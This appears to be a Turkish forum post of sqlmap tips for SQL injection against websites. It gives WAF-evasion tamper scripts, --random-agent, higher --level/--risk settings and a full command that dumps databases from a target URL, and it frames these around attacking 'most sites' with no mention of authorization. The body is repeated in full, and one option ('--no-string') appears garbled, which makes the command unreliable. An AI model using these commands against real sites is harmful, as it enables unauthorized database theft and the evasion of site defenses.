Merhaba arkadaşlar bir çoğunuz sqlmap de sadece --dbs komutunu bilir ama sqlmap bundan ibaret değildir bir çok komutu vardır ve bunlar sayesinde daha çok verim alabilirsiniz.O komutlar şöyle
--tamper komutu her zaman kullanırım bu komut şu demek
[CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
Hatası aldığımızda kullanırız bu komutu.Ama sadece --tamper değil komutumuzun çıktısı şöyle olur --tamper=greatest,charencode,base64encode ve bir sürü var bunlara bakmak için Terminale
cd /usr/share/sqlmap/tamper komutunu yazın
----------------------------------------------
--random-agent komutu bu komutu yazarsanız critical hatası alma oranı azalır.
-----------------------------------------------
Çoğu sitede şu hatayı alırız
[CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Burda --string --level --risk değerlerini girmemiz gerekmektedir.Oda şöyle
sqlmap -u www.site.com/index.php?id=1 --no-string --level=3 --risk=3 --dbs
------------------------------------------------
Databaseleri çekmezse şu komutu girmemiz gerekir
--threads=10 --no-cast
--------------------------------------------------
Eğer connection timet out hatası alırsak
--timeout=30 değerini girmemiz yeterli olucakdır.
Saygılarımla..
--tamper komutu her zaman kullanırım bu komut şu demek
[CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
Hatası aldığımızda kullanırız bu komutu.Ama sadece --tamper değil komutumuzun çıktısı şöyle olur --tamper=greatest,charencode,base64encode ve bir sürü var bunlara bakmak için Terminale
cd /usr/share/sqlmap/tamper komutunu yazın
----------------------------------------------
--random-agent komutu bu komutu yazarsanız critical hatası alma oranı azalır.
-----------------------------------------------
Çoğu sitede şu hatayı alırız
[CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Burda --string --level --risk değerlerini girmemiz gerekmektedir.Oda şöyle
sqlmap -u www.site.com/index.php?id=1 --no-string --level=3 --risk=3 --dbs
------------------------------------------------
Databaseleri çekmezse şu komutu girmemiz gerekir
--threads=10 --no-cast
--------------------------------------------------
Eğer connection timet out hatası alırsak
--timeout=30 değerini girmemiz yeterli olucakdır.
Saygılarımla..
